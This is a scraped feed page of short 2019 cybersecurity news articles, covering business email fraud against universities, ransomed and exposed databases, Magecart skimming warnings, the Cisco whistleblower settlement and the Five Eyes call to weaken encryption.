Info Security

Subscribe to Info Security  feed
Updated: 54 min 2 sec ago

BEC Scammers Cost US Universities Over $872K

Mon, 08/05/2019 - 10:45
BEC Scammers Cost US Universities Over $872K

A BEC scammer has pleaded guilty to his part in an operation in which he and co-conspirators tricked two US universities into sending over $872,000 to their accounts.

In July 2918, the University of California San Diego (UCSD) was sent an email spoofed to come from a Dell account demanding the institution redirect its payments to the firm to a new bank account in Minnesota.

The bank account belonged to Amil Hassan Raage, who pleaded guilty to fraudulently receiving nearly $750,000 in 28 payments from the university, From August 8 to September 12 2018.

Raage apparently withdrew the money each time it was wired and transferred it to another account.

His unnamed co-conspirators played a major part in the operation, by creating the spoofed Dell email account from a base in Kenya.

They went through the same modus operandi to defraud a second US university, this time based in Pennsylvania.

According to the Department of Justice (DoJ), the group again used the fake Dell email to trick university officials into wiring funds to a different account.

In total, it sent six payments of over $123,000.

After the Wells Fargo bank in Minnesota froze Raage’s account, he fled the country in September to Kenya, only to be tracked down by local law enforcers working with the FBI’s legal attache in the African country.

He was finally arrested in May 2019 and extradited a couple of weeks after.

“Modern criminals like Raage have ditched the ski mask and getaway vehicle and opted for a computer as their weapon of choice. As this defendant has learned, we are matching wits with new-age thieves and successfully tracking them down and putting an end to their high-tech deception,” said US attorney Robert Brewer.

BEC attacks cost businesses nearly $1.3bn last year, nearly half of the total cybercrime losses recorded by the FBI.

Categories: Cyber Risk News

Over Two Million Online Records Held to Ransom

Mon, 08/05/2019 - 09:35
Over Two Million Online Records Held to Ransom

A Mexican bookstore that exposed millions of records through a publicly accessible database has had the data stolen and ransomed by hackers.

Libreria Porrua left the 2.1 million customer records online in a MongoDB database at two separate IP addresses, according to Comparitech, who collaborated with security researcher Bob Diachenko on the case.

The company, a bookseller and publisher with a history going back over 100 years, failed to respond to Diachenko when he notified it of the discovery on July 15. Three days later, the data had been wiped and replaced with a ransom note demanding around $500 in Bitcoin.

Public access to the database was disabled the next day, but it’s unclear whether the company paid the ransom or not.

Two sets of records were included in the trove: the first featuring names, addresses, phone numbers, emails, shipping numbers, invoice details and hashed payment card info. The second featured full names, dates of birth, phone numbers, discount card activation codes and more.

“I have previously reported that the lack of authentication allows the installation of malware or ransomware on the MongoDB servers. The public configuration makes it possible for cyber-criminals to manage the whole system with full administrative privileges,” Diachenko is quoted as saying.

“Once the malware is in place, criminals could remotely access the server resources and even launch a code execution to steal or completely destroy any saved data the server contains.”

Customers of the bookstore are potentially at risk from follow-on phishing attacks if the hackers decide to monetize their efforts further.

MongoDB has been a favorite target for hackers looking to capture and hold customer data to ransom over the past few years.

Several such cases emerged in 2017, but one of the most serious related to a 2018 incident when a database containing the voter records of over 19.5 million Californians was held to ransom.

Categories: Cyber Risk News

Destructive Malware Goes Mainstream as Attacks Soar 200%

Mon, 08/05/2019 - 08:48
Destructive Malware Goes Mainstream as Attacks Soar 200%

The volume of destructive malware attacks has risen by 200% year-on-year in the first half of 2019, according to new data from IBM X-Force.

Once the preserve of sophisticated nation state actors, it appears as if financially motivated cyber-criminals are now getting in on the act, which is bad news for a range of organizations, according to the Incident Response and Intelligence Services (IRIS) report.

Analyzing incident response data from the first six months of the year, the report claimed that such attacks now cost multi-nationals on average $239m — 61-times more than the industry average of around $3.9m.

They also take a long time to respond to and remediate — on average 512 hours — with many victim organizations using multiple companies to assist them, further increasing the time taken.

Most concerning for organizations caught out by a destructive attack: on average a single blitz destroys 12,000 machines per company.

Destructive attacks have most commonly been associated with sophisticated malware such as Stuxnet, DarkSeoul and Shamoon, as nation states go after geopolitical rivals, explained IBM X-Force in a blog post introducing the research.

“Since 2018, however, we have observed the profile of these attacks expanding beyond nation-states as cyber-criminals increasingly incorporate destructive components, such as wiper malware, into their attacks,” it added.

“This is especially true for cyber-criminals who use ransomware, including strains such as LockerGoga and MegaCortex. Financially motivated attackers may be adopting these destructive elements to add pressure to their victims to pay the ransom, or to lash out at victims if they feel wronged.”

Half of these attacks — centered around the US, Middle East and Europe — targeted manufacturing during the reporting period, with oil and gas and education sectors also hit hard.

Hackers are often inside networks for weeks or months before launching their attacks, IBM said.

“Destructive malware adversaries often gain initial entry into systems through phishing emails, password guessing, third-party connections and watering hole attacks,” it added.

“We observe them taking care to covertly preserve access to privileged accounts or critical devices for the destructive phase of their attack, using them alongside legitimate remote command services within the targeted environment, such as PowerShell scripts, to move laterally through the victim’s network.”

Defense-in-depth is the answer, with MFA, well-tested incident response plans, network monitoring, threat intelligence and regular offline back-ups essential, IBM recommended.

Categories: Cyber Risk News

BSides Manchester Hits Back at Sponsor Influence Claims

Fri, 08/02/2019 - 15:55
BSides Manchester Hits Back at Sponsor Influence Claims

The organizers of BSides Manchester have hit back at accusations of corporate influence by a sponsor. 

In a series of tweets, degenerateDaE highlighted the number of talks being given by employees of NCC Group, and noted that the company is also the platinum sponsor. “Out of the six organizers listed I was able to confirm at least 5/6 worked at NCC when BSides Manchester was created in 2014,” they said, pointing out that at least three still work for NCC Group.

“Figured I'd tweet about this because the link between NCC and BSides Manchester was not one that I was personally aware of, nor have I seen anyone else talk about this. It would be great to get some transpancy on this from the BSides Manchester team.”

Responding, BSides Manchester organizing committee member Matt Summers posted a statement calling the accusation “incredibly hurtful and makes us as organizers question why we do this.”

He clarified that “BSides Manchester is directed by three directors (board members) and listed as a Community Interest Company (CIC) which means that it is a not-for-profit and regulated as such.”

He went on to say that there are other directors who are not board members but who have helped organize the conference – some of whom are or have been directly employed by NCC Group. “However a few people who have remained in the shadows and who were not outed by this individual have never been employed by NCC Group. The directors and board members of the CIC have never hidden their employment from the community.”

Saying that the intention of BSides Manchester was about putting on a regional event as he “missed the camaraderie of BSides London,” and he pitched the idea of a BSides Manchester to a senior person at NCC Group. “Why? Because I needed some seed money to get the event off the ground.”

He said: “Since 2014 NCC Group consistently sponsored as a platinum sponsor with other companies coming and going as platinum sponsors, but we have never turned a company down when it came to the level of sponsorship they wanted.

“Over the last two years we have had three platinum sponsors. Over the years this has meant that we have had to rejig the layout of the venue to ensure that everyone gets what it is in the contract and every sponsor got a fair and honest slice of the pie.”

Regarding the accusations of conflict of interest and insinuations that NCC Group had gained an unfair advantage over other sponsors and speakers, Summers said he had always been forthright with people that I wear two hats, one for his employer and one for BSides “and anyone who knows me will know that I let my actions speak for me.”

He said: “This accusation is unfounded quite frankly insulting. Unfortunately, I can’t prove in any way that there is no conflict of interest. As board members and directors we insulated ourselves from the team that NCC Group put together to sponsor the event, I can’t prove this but I can say that we had a big enough job putting an event together without steering NCC Groups efforts at the event.

“There are also additional people who helped us put the event on that were not employed by NCC Group but I won’t call them out and drag them into this. NCC Group does have robust procedures about additional employment and ensuring that there are no conflicts of interest with any additional employment and I would hope that this would be enough for all parties.”

He also clarified that NCC Group is “probably the biggest employer of security people in Manchester,” and he praised them for being “incredibly supportive of those wishing to speak publicly.”

Security researcher Javvad Malik, who was one of the original organizing team of BSides London in 2011, along with Summers, praised him for being “one of the hardest workers in the room.”

Malik said: “It pains me to see accusations thrown at him, when I know he's a man of integrity and honesty. He invited me down to the first few BSides Manchesters to compere track one. I was incredibly honored. But again, I saw first hand how much of himself he puts into these events. BSidesMCR was no exception, and it was run really well.

“So the question is, does NCC have an undue influence over BSidesMCR? And if you knew Matt at all, that's a shameful question to ask. I would never believe it, and I've seen pretty close how he runs cons.”

Malik made the point that if anyone feels like there are too many NCC Group employees running the conference, “put yourself forward and offer to help run the con yourself. It'll open your eyes to a lot of things.” This was echoed by Summers, who said: “The last thing I want to say is that every year we have asked for people to join us as organizers. In fact it’s on our website that we want people to help us.

“If people want transparency, then they can join us as organizers to see for real.”

Categories: Cyber Risk News

Initiative Launched to Protect Automotive Supply Chain

Fri, 08/02/2019 - 15:01
Initiative Launched to Protect Automotive Supply Chain

A new initiative has been announced by the Automotive Industry Action Group (AIAG) to help automotive suppliers compare their current capabilities to industry best practice.

Developed in partnership with NCQ, the Cyber Safe Bundle includes a one-time virtual audit, along with either a basic or advanced enterprise risk assessment. Together, these resources allow suppliers to evaluate their overall cybersecurity efforts and identify the most critical areas for improvement.

The audit is a remote threat analysis that searches a supplier-provided URL or domain name for known vulnerabilities using a database of more than 53,000 common configuration issues, updated in real time with the latest threats. It then identifies system weaknesses without damaging the resource being checked and provides an automated corrective action plan with practical steps the supplier can take to improve its cybersecurity.

Tanya Bolden, AIAG’s director of supply chain products and services, said: “Cyber-attacks have become so prevalent that larger companies are now spending thousands and sometimes millions of dollars to protect their systems. AIAG feels strongly about the importance of making resources developed by OEMs available to smaller companies in the automotive supply chain – companies that may not have the budget or human resources available to proactively protect themselves from cyber-attack.

“The perception is that only larger companies are targeted for cyber-attack, but the fact is that small and medium-sized companies are particularly vulnerable. A supply chain is only as strong as its weakest partner, which is why cyber-attackers go after companies that may be easier targets.” 

Charles Morrison, NQC managing director, added: “We are very pleased to bring our expertise to this collaboration with AIAG, and we are confident this suite of tools will provide much needed protection to suppliers across the industry.”

Categories: Cyber Risk News

DCMS Committee Request Further Facebook Details on Cambridge Analytica Investigation

Fri, 08/02/2019 - 09:00
DCMS Committee Request Further Facebook Details on Cambridge Analytica Investigation

Chair of the Digital, Culture, Media and Sport Committee Damian Collins MP has written to Facebook VP for global affairs and communications Sir Nick Clegg about discrepancies relating to the Cambridge Analytica investigation.

Collins asked the former Deputy Prime Minister and Liberal Democrats leader, who joined Facebook in October 2018, about who at Facebook knew what and when about Cambridge Analytica’s activities on the platform with the “this is your digital life” app, which lead to the misuse of 87 million people’s data.

Claiming that “senior executives from Facebook, including its Chief Technology Officer Mike Schroepfer and Lord Richard Allan, consistently asserted in evidence over the course of 2018 to the Committee that Facebook first learned that Global Science Research (GSR) and Cambridge Analytica had compromised Facebook user data from a Guardian article published in December 2015,” the SEC said its complaint states that Facebook employees already knew about Cambridge Analytica prior December 2015.

“We therefore request a response on whether the SEC complaint is accurate that employees did raise concerns about Cambridge Analytica before December 2015 and how these discrepancies in evidence have occurred,” Collins letter stated.

Also, despite the red flags raised by Facebook employees about Cambridge Analytica from as early as September 2015, these incidents were not reported to senior management. In a letter to the Committee dated May 14 2018, Rebecca Stimson, Facebook’s UK head of public policy, confirmed that “Mr. Zuckerberg did not become aware of allegations that Cambridge Analytica may not have deleted data about Facebook users obtained through Dr Kogan’s app until March of 2018, when these issues were raised in the media.”

Also, Collins sought guarantees on the deletion of user data held by Cambridge Analytica, as the SEC Complaint notes that several Facebook employees were also aware of data misuse throughout 2016 and beyond. On February 8 2018, Simon Milner, policy director at Facebook, denied to the Committee that Cambridge Analytica held a “large chunk of Facebook user data.”  

Collins said that the Committee were requesting information on instances that concerns about Cambridge Analytica were raised by employees and why no action was taken until 2018, and why the Committee was not informed about these concerns in the sessions with Milner and Schroepfer.

Last week, the Securities and Exchange Commission fined Facebook $100m “for making misleading disclosures regarding the risk of misuse of Facebook user data.” The SEC’s complaint alleged that Facebook discovered the misuse of its users’ information in 2015, but did not correct its existing disclosure for more than two years.

Stephanie Avakian, co-director of the SEC’s Enforcement Division said: “As alleged in our complaint, Facebook presented the risk of misuse of user data as hypothetical when they knew user data had in fact been misused. Public companies must have procedures in place to make accurate disclosures about material business risks.”

Categories: Cyber Risk News

70% of Orgs Will Use Security-as-a-Service by 2021

Fri, 08/02/2019 - 08:15
70% of Orgs Will Use Security-as-a-Service by 2021

More than 70% of organizations will be using Security-as-a-Service by 2021, according to new research from Thycotic.

The privileged access management provider surveyed IT managers and technology decision makers at the KuppingerCole European Identity & Cloud conference in Munich in May, compiling its findings in the Security as a Service on the Rise report.

Two out of three respondents said their organization is already adopting Security-as-a-Service, or will be in the next 12 months, with 70% planning to do so by 2021. Those polled cited reduced costs, faster IT services delivery and greater flexibility as reasons for opting for Security-as-a-Service solutions.

“Organizations typically use Security-as-a-Service solutions to limit or eliminate the need for on-premise hardware, software or specialized skilled resources,” said Joseph Carson, chief security scientist at Thycotic.

Respondents also indicated they are turning to cloud-based security services to help keep up with rapidly escalating threats, costs and a lack of staff resources with cybersecurity expertise.

“In another interesting result, the survey showed the security functions most frequently moved to Cloud-as-a-Service were led by Privileged Account Management and Identity Access Management,” added Carson.

Categories: Cyber Risk News

Vendor Blocks 65,000 Magecart Data Theft Attempts in July

Thu, 08/01/2019 - 15:30
Vendor Blocks 65,000 Magecart Data Theft Attempts in July

Magecart groups appear to be having a busy summer so far, with one security vendor blocking 65,000 attempts to steal card details from online stores in July alone.

Malwarebytes revealed the findings in a new blog post: it shows that US shoppers account for the vast majority of those targeted, nearly 54% in total. Canadians came in second with nearly 16% and then there’s a long tail of countries including Germany (7%), the Netherlands (6%), France and the UK (5%) and Australia (3%).

The firm claimed it is becoming increasingly difficult to differentiate digital skimming groups by code types alone, as copycats reuse existing tools.

There’s also a growing trend among these hackers to use some kind of obfuscation to stay hidden.

“This is an effort to thwart detection attempts and also serves to hide certain pieces of information, such as the gates (criminal controlled server) that are used to collect the stolen data,” said Jérôme Segura, director of threat intelligence at Malwarebytes.

Visiting only larger online sites is no guarantee that consumers will be safe from digital skimmers, especially given the attacks on big-name brands like BA, Newegg and others. BA was famously issued a record £183m proposed fine last month by the ICO for breaking the GDPR.

“Combating skimmers ought to start server-side with administrators remediating the threat and implementing a proper patching, hardening and mitigation regimen. However, based on our experience, a great majority of site owners are either oblivious or fail to prevent reinfections,” argued Segura.

“A more effective approach consists of filing abuse reports with CERTs and working with partners to take a more global approach by tackling the criminal infrastructure. However, even that is no guarantee, especially when threat actors rely on bulletproof services.”

One noteworthy bulletproof hosting service was revealed last month to be operating out of a war zone in eastern Ukraine.

Categories: Cyber Risk News

(ISC)2 Granted Approved Professional Organization Status by HMRC

Thu, 08/01/2019 - 14:55
(ISC)2 Granted Approved Professional Organization Status by HMRC

(ISC)2, the nonprofit membership association of certified cybersecurity professionals, announced that it has been granted Approved Professional Organizations and Learned Societies status by HM Revenue & Customs (HMRC).

This status recognizes (ISC)2 among a select number of essential professional societies and bodies that share or advance professional knowledge, maintain or improve professional conduct and competence or protect members from claims made against them while doing their job. It also allows UK members of (ISC)2 to claim tax relief on their annual maintenance fee.

The learned societies and professional associations on the list are predominantly nonprofit organizations, such as industry bodies, charter organizations and livery companies, as well as independent member associations that exist to raise standards and help their members. The inclusion of (ISC)2 on the list is recognition of its efforts to inspire a safe and secure cyber-world and advance cybersecurity knowledge and skills through training and certification.

Speaking to Infosecurity, Dr. Casey Marks, chief product officer and vice president, (ISC)2, said that the HMRC approval is validation that mission of (ISC)2 to inspire a safe and secure cyber-world is of vital importance to the UK government.

“It means that our members are now recognized by the UK’s tax authority as serving an essential professional function and as such, they can claim tax relief on their annual fees,” he added. “It will also help some of our members recoup their membership fees, as some UK employers only reimburse professional memberships if they are part of the HMRC list. The HMRC approval essentially lightens the out-of-pocket costs that these skilled professionals pay and lets them focus on defending their organizations from attacks.

“We hope that the HMRC approval incentivizes more interested professionals to pursue certification with us and build careers focused on bolstering cybersecurity defenses in both the private and public sectors.”

Categories: Cyber Risk News

Bug Bounties Paid for Deep Testing and Less for Traditional Flaws

Thu, 08/01/2019 - 13:10
Bug Bounties Paid for Deep Testing and Less for Traditional Flaws

The number of vulnerabilities being reported and bug bounty payouts per vulnerability have increased this year. 

According to Bugcrowd’s State of Crowdsourced Security in 2019 report, there has been a 92% increase in the total number of vulnerabilities reported in the last year, while the average payout per vulnerability increased this year by 83%.

Bugcrowd said that more industries are adopting crowdsourced security programs, and crowdsourced pen testing and vulnerability disclosure “are growing at breakneck pace and the number of companies running programs for multiple years has resulted in a marked increase in the number of public programs.”

David Baker, CSO and VP of operations at Bugcrowd, told Infosecurity that “this is both a good thing and proof there are always more bugs to be found.”

“More bugs are not the result of a lack of testing or poor SDLC [software development life cycle], but the shift to cloud, push to mobile apps and adoption of IoT,” he said. “Ultimately, the fact that the crowd is finding more and more P1s means that these critical bugs are being identified and resolved sooner. Finding bugs is a good thing; promoting better defense through a better offense is a great SDLC strategy.”

Bugcrowd also said that the average payout for critical vulnerabilities reached $2,669.92, a 27% increase over the last year. However, it claims that “researchers are no longer going after things like XSS, CSRF, and SSI as those are fairly easy to find by many scanners out there today” and are now doing deep testing, leading to the top five vulnerabilities over the past year as: 

  1. Broken access control
  2. Sensitive data exposure
  3. Server security misconfiguration
  4. Broken authentication and session management
  5. Cross-site scripting

Speaking to Infosecurity, Luta Security CEO Katie Moussouris said that “broken access control” is a very broad category “that absolutely can still be quantified as low-hanging fruit” and if an organization places no authentication at all on an asset or API, that's a simple mistake, not at all indicative of deeper or more sophisticated bugs. “Same goes for information disclosure findings that lead to data exposure, the second one in that list.” 

Moussouris said that even organizations with a lot of general process maturity and a strong secure development life cycle see basic XSS bugs crop up, especially in third-party developed websites.

“The fact of the matter is that while bug bounty hunting can help out," she said, "organizations cannot use them or any other external testing mechanism as a checkbox to excuse complacency in prevention of common classes of bugs, like authentication bugs.”

Moussouris went on to say that in the main some organizations view bug bounties “as a way to look busy and responsive in security, when it's actually masking underlying security negligence” and the classes of bugs most often found in bug bounties are still on the lower end of sophistication.

“Most organizations should be actively trying to prevent and detect those themselves, not outsource their detection to the luck of the bug bounty draw.”

Categories: Cyber Risk News

PCI Council & Retail ISAC Issue Magecart Warning

Thu, 08/01/2019 - 10:32
PCI Council & Retail ISAC Issue Magecart Warning

The PCI Security Standards Council and Retail and Hospitality ISAC have joined forces to highlight the growing threat of online skimming attacks, such as Magecart.

“These attacks infect e-commerce websites with malicious code, known as sniffers or JavaScript sniffers and are very difficult to detect,” an alert stated. “Once a website is infected, payment card information is ‘skimmed’ during a transaction without the merchant or consumer being aware that the information has been compromised.”

As the attacks either directly impact e-commerce websites or a third party’s software libraries, which merchants rely upon “these service providers may not be aware of the risk they create for their customers if they are not focused on security and the potential threats targeting them.”

Troy Leach, chief technology officer, PCI Security Standards Council, said: “We have heard from many of our stakeholders in the payment community that these types of attacks are a growing trend for many businesses, large and small. We felt, as a leader in payment security, now was the time to issue a bulletin with our friends and colleagues from the retail and hospitality sector who battle these threats daily.”  

The alert warned that any e-commerce implementation that does not have effective security controls in place is potentially vulnerable. “There are ways to prevent these difficult-to-detect attacks however,” said Leach. “A defense-in-depth approach with ongoing commitment to security, especially by third-party partners, will help guard against becoming a victim of this threat.” 

Carlos Kizzee, vice-president, intelligence at the Retail and Hospitality ISAC, added that these attack techniques are of increasing significance to the retail and hospitality industry, and it is important that businesses grow their awareness of the nature of these attacks and of the security controls necessary to detect and defeat them.

Kizzee said: “The bulletin we are jointly issuing today should be a call to action to those in the business community to enhance their awareness of and vigilance against these techniques. No one should presume that they couldn’t or won’t be used to target their enterprise.

“We must endeavor to ensure that focused attention, commitment and peer collaboration in e-commerce cybersecurity efforts within the retail and hospitality industry outpaces the growth and evolution of threats such as these.”

Categories: Cyber Risk News

Honda Exposes 40GB of Company Data

Thu, 08/01/2019 - 10:27
Honda Exposes 40GB of Company Data

Global automobile manufacturer Honda leaked a database of company data that exposed 134 million documents, roughly 40GB of information.

In a blog post, researcher xxdesmus revealed how he discovered an Elasticsearch database without any authentication.

“The data contained within this database was related to the internal network and computers of Honda Motor Company. The information available in the database appeared to be something like an inventory of all Honda internal machines. This included information such as machine hostname, MAC address, internal IP, operating system version, which patches had been applied, and the status of Honda’s endpoint security software. I would like to thank the security team at Honda Motor Company for their very prompt action to secure the database shortly after being notified.”

A statement from Honda to the researcher read: “The security issue you identified could have potentially allowed outside parties to access some of Honda’s cloud-based data that consisted of information related to our employees and their computers. We investigated the system’s access logs and found no signs of data download by any third parties. At this moment, there is no evidence that data was leaked, excluding the screenshots taken by you. We will take appropriate actions in accordance with relevant laws and regulations, and will continue to work on proactive security measures to prevent similar incidents in the future.”

Igor Baikalov, chief scientist at Securonix, said, “This is a hacker’s dream, a treasure trove of the most sought-after information. Whoever has it can own Honda’s network. While it is unclear if this data has already been accessed by someone maliciously, it does highlight a concerning flaw in the security practices of Honda.”

If an attacker has already gained access they could use the data to carry out further attacks and gain deeper access to Honda’s networks causing substantial damage, he added.

“This incident should be a lesson to organizations that any documents, servers or databases should be secured and at the very least password protected. What may seem like meaningless logs to an organization could actually provide a wealth of opportunity to a skilled and knowledgeable attacker.”

Categories: Cyber Risk News

Resource Headaches Top Security Pros’ Challenges

Thu, 08/01/2019 - 09:05
Resource Headaches Top Security Pros’ Challenges

Dwindling resources, experience and skills are the biggest challenges facing the cybersecurity profession today, according to new research from the Chartered Institute of Information Security.

Nearly half (45%) of those polled for the institute’s annual survey, The Security Profession in 2018/19, pointed to lack of resources as the biggest issue they face, followed by lack of experience (37%) and skills shortages (31%).

The latter have been an issue for years, with global shortages estimated at nearly three million, including 142,000 in EMEA.

What industry professionals there are threaten to be swamped by the black hats: just 11% of respondents said security budgets were rising in line with, or ahead of, threat levels, while the majority (52%) said budgets were rising, but not quickly enough. 

When asked to choose between people, process and technology, the vast majority of professionals polled for this report claimed that people (75%) were the biggest challenge to cybersecurity, rather than process (12%) and technology (13%).

“Clearly, this could be a shortage of skilled security architects, the fact that developers seldom create secure code, the user awareness problem where passwords and phishing emails are concerned; probably it is a combination of people related issues,” the report explained.

On the plus side, the dearth of qualified professionals led a majority of respondents to claim this is a good time to join the industry: 86% said the industry will grow over the next three years and 13% said it will “boom.”

In addition, over 60% claimed the profession is getting better – or much better – at dealing with security incidents when they occur, while less than half (48%) said the same about defending systems from attack and protecting data. In fact, 14% said the profession is getting worse at this.

This highlights a general trend of organizations being forced to broaden their approach from prevention alone to include incident response.

“IT security is a constant war of attrition between security teams and attackers, and attackers have more luxury to innovate and try new approaches,” said Amanda Finch, CEO of the Chartered Institute of Information Security.

“As a result, the industry’s focus on dealing with breaches after they occur, rather than active prevention, isn’t a great surprise – the former is where IT teams have much more control. Yet in order to deal with breaches effectively, security teams still need the right resources and to increase those in line with the threat. Otherwise they will inevitably have to make compromises.”

Categories: Cyber Risk News

Cisco Pays $8.6m to Settle Software Flaw Claims

Thu, 08/01/2019 - 08:06
Cisco Pays $8.6m to Settle Software Flaw Claims

Cisco has agreed to pay $8.6m to settle a lawsuit filed by a client alleging the networking giant knowingly sold video surveillance kit containing serious security vulnerabilities.

US law firm Phillips & Cohen said it filed a qui tam, or whistleblower, lawsuit on behalf of James Glenn, a consultant for a Cisco partner company of Danish origin. The firm is said to have fired Glenn after he submitted a report to Cisco detailing the flaws.

Although Cisco eventually fixed the software flaws, the lawsuit alleged that the firm potentially exposed the federal and state-level agencies that used the equipment.

The settlement covers sales of Cisco’s Video Surveillance Manager from 2007 to 2014. The system allows customers to manage and connect multiple internet-connected cameras through a central server.

Whistleblower attorney, Claire Sylvia, argued that many federal and state agencies depended on Cisco’s video surveillance systems to help monitor security at their facilities.

“Our client raised important security concerns. We alleged in our complaint that the software flaws were so severe that they compromised the security of the video surveillance systems and any computer system connected to them,” said Sylvia.

“Cybersecurity products are an important piece of government spending these days, and it’s essential that those products comply with critical regulatory and contractual requirements. The tech industry can expect whistleblowers to continue to step forward when serious problems are ignored, thanks to laws that reward and protect them.”

Cisco will pay the federal government and 15 states, as well as various cities, counties and other regional US administrations. Glenn himself will receive around $1.6m.

According to Cisco, this payment settles litigation originally brought in 2011. It revealed in a blog post that the software in question came from an acquisition of Broadware in 2007.

“Because of the open architecture, video feeds could theoretically have been subject to hacking, though there is no evidence that any customer’s security was ever breached. In 2009, we published a Best Practices Guide emphasizing that users needed to pay special attention to building necessary security features on top of the software they were licensing from us,” explained general counsel, Mark Chandler. 

“In July, 2013, we advised that customers should upgrade to a new version of the software which addressed security features. All sales of the older versions of the software had ended by September, 2014.”

Categories: Cyber Risk News

#CyberSecuredForum: Answers to Security Questions

Wed, 07/31/2019 - 14:47
#CyberSecuredForum: Answers to Security Questions

At the final day of the Cyber: Secured Forum in Dallas, moderators hosted a series of discussions in which attendees played a crucial part in putting forth solutions to some of the the most pressing cyber–physical topics facing the security industry.

Attendees were divided into four different groups to collaborate on responses to some of the biggest cyber–physical challenges, including:

  • The Tenants of a Cybersecurity Hardening Guide
  • Privacy in the Age of Connected Devices
  • Show Me the Money: The Considerations for Monetizing Cybersecurity as an Integrator
  • Gap Analysis – How the Security Industry Should Address Cybersecurity

In coming together to share their responses, attendees expressed their collective ideas. One of the key concerns for integrators is understanding how to monetize cybersecurity. In order to do this successfully, integrators need to acquire an array of skill sets that they might not have. For those that are looking to grow and be the experienced industry provider, they need to rely on the skills of others while they themselves grow and learn.

While it’s not all about the money, business is all about the money. Unfortunately, connectivity has opened up a Pandora’s box of opportunity and challenges for the physical security industry. Integrators are seeking to monetize cybersecurity services while ensuring new threats to their customers are mitigated in the systems they deploy.

In looking at privacy in the age of connected devices, attendees recognize that the lack of security in the internet of things poses not only digital but also physical privacy vulnerabilities. As such, solutions providers are working to ensure that their connected products are hardened out of the box and that the folks deploying them have the guidance to ensure that they provide customer value, not cybersecurity headaches.

The security industry needs to shift its siloed thinking order to really address cybersecurity. One overarching theme of the Cyber: Secured Forum was that the lines between physical and cybersecurity are slowing disappearing. The vulnerabilities are overlapping, the risks are expanding and the ability to mitigate risks is hampered by an ever-growing skills gap. Collaboration, now more than ever, is key.

Categories: Cyber Risk News

#CyberSecuredForum: Physical, Cyber Unite

Wed, 07/31/2019 - 13:41
#CyberSecuredForum: Physical, Cyber Unite

Physical and cyber are two sides of the same “security industry” coin, said George Finney, CISO, Southern Methodist University, in his keynote speech on the closing day of the Cyber: Secured Forum.

“There’s not really a difference from the hacker perspective. They are trying to use whatever avenue they can to exploit your company,” Finney said. Where once penetration testers might have only tested the network, now Finney has pen testers come to campus and try to break into the wireless network or use social engineering methods to access areas of campus where they aren’t supposed to be.

While the university is charged with protecting student data, Finney said, “We also want to protect them, wherever they are.”

The security industry is made up of people. In physical and cybersecurity, “both of us make our spouses sit with their backs to the restaurant so that we can see all the exits. We both integrate highly complex technologies, and we both know that the bad guys are going to figure out what our defenses are,” Finney said.

For years, it was believed that you couldn't have cybersecurity without physical security, but today, Finney said, the opposite is also true.

Finney shared lessons he learned as the CISO of Southern Methodist University, which has integrated support for physical security technologies and cybersecurity on the same team, promoted by a major event on campus.

The opening ceremony of the George W. Bush Presidential Library and Museum was planned on the SMU campus, and Finney explained that the Secret Service told him that the event would be the biggest security event because five living presidents would be in attendance.

Finney said that his team has completed a campus-wide lock-down initiative, centralized support and increased response time to improve security for the event with the help of an integrator. The initiatives then had the lingering effect of improving the student experience, which has successfully helped to reduce crime on campus – all while hardening systems against hacking.

Categories: Cyber Risk News

We Must Weaken Encryption, Say ‘Five Eyes’ Ministers

Wed, 07/31/2019 - 13:32
We Must Weaken Encryption, Say ‘Five Eyes’ Ministers

Senior ministers from the UK, Australia, Canada, New Zealand and the United States have announced their support of weakening encryption, essentially asking tech companies to install backdoors in encrypted communications.

The news comes following a two-day security summit in London, where home affairs, interior security and immigration ministers of the ‘Five Eyes’ countries discussed current and emerging threats which could undermine national and global security.

As detailed in the an official UK government release, “During a roundtable with tech firms, ministers stressed that law enforcement agencies’ efforts to investigate and prosecute the most serious crimes would be hampered if the industry carries out plans to implement end-to-end encryption, without the necessary safeguards.”

Home Secretary Priti Patel said: “The Five Eyes are united that tech firms should not develop their systems and services, including end-to-end encryption, in ways that empower criminals or put vulnerable people at risk.

“We heard today about the devastating and lifelong impact of child sexual exploitation and abuse, and agreed firm commitments to collaborate to get ahead of the threat.

“As Governments, protecting our citizens is our top priority, which is why through the unique and binding partnership of Five Eyes we will tackle these emerging threats together.”

Also speaking at the conclusion of the two-day conference was United States Attorney General William P. Barr. Barr said that encryption presents a unique challenge and the Five Eyes partnership has a duty to protect public safety, including those related to the internet.

“We must ensure that we do not stand by as advances in technology create spaces where criminal activity of the most heinous kind can go undetected and unpunished.”

However, Javvad Malik, security awareness advocate at KnowBe4, said that calls to weaken encryption, or to place backdoors in, are periodically made by ill-informed politicians.

“No matter how hotly this is debated, it can't change the maths behind encryption, which will either work or not. Weakening encryption will do more harm than good, as it will leave all communication vulnerable and allow bad actors to compromise legitimate traffic,” he argued.

Categories: Cyber Risk News

Criminals Target FinServ With Layered Attacks

Wed, 07/31/2019 - 13:07
Criminals Target FinServ With Layered Attacks

Organizations in the financial services sector have repeatedly been impacted by attackers leveraging credential stuffing and unique phishing attempts, according to newly released data in Akamai’s 2019 State of the Internet/Security Financial Services Attack Economy Report.

The report found that 50% of all the companies impacted by observed phishing domains were in the financial services sector. The report reflects the analysis of 3.5 billion attempts during an 18-month period that have put the personal data and banking information of financial services customers at risk.

Researchers observed that, between December 2, 2018, and May 4, 2019, 197,524 phishing domains were discovered. Customers were directly targeted in 66% of those attacks. In addition, “94% of the attacks against the financial services sector came from one of four methods: SQL Injection (SQLi), Local File Inclusion (LFI), Cross-Site Scripting (XSS), and OGNL Java Injection (which accounted for more than 8 million attempts during this reporting period), based on Akamai’s calculations,” according to the report.

“We’ve seen a steady rise in credential stuffing attacks over the past year, fed in part by a growth in phishing attacks against consumers,” said Martin McKeay, security researcher at Akamai and editorial director of the State of the Internet/Security Report. “Criminals supplement existing stolen credential data through phishing, and then one way they make money is by hijacking accounts or reselling the lists they create. We’re seeing a whole economy developing to target financial services organizations and their consumers.”

Criminals are using "bank drops," which researchers explained are packages of data that include a person’s stolen identity, that can be used to open accounts at a given financial institution. The packages are known as "fullz" by criminals online and include an individual’s name, address, date of birth, Social Security details, driver’s license information and credit score.

While financial institutions are trying to understand the methods criminals are using to open these drop accounts, attackers are gaining more success because they continue to target the financial services industry.

“Attackers are targeting financial services organizations at their weak points: the consumer, web applications and availability, because that’s what works,” said McKeay. “Businesses are becoming better at detecting and defending against these attacks, but point defenses are bound to fail. It requires being able to detect, analyses, and defend against an intelligent criminal who’s using multiple different types of tools for a business to protect its customers.”

Categories: Cyber Risk News

UK Firms Move Operations as Brexit Data Fears Grow

Wed, 07/31/2019 - 10:30
UK Firms Move Operations as Brexit Data Fears Grow

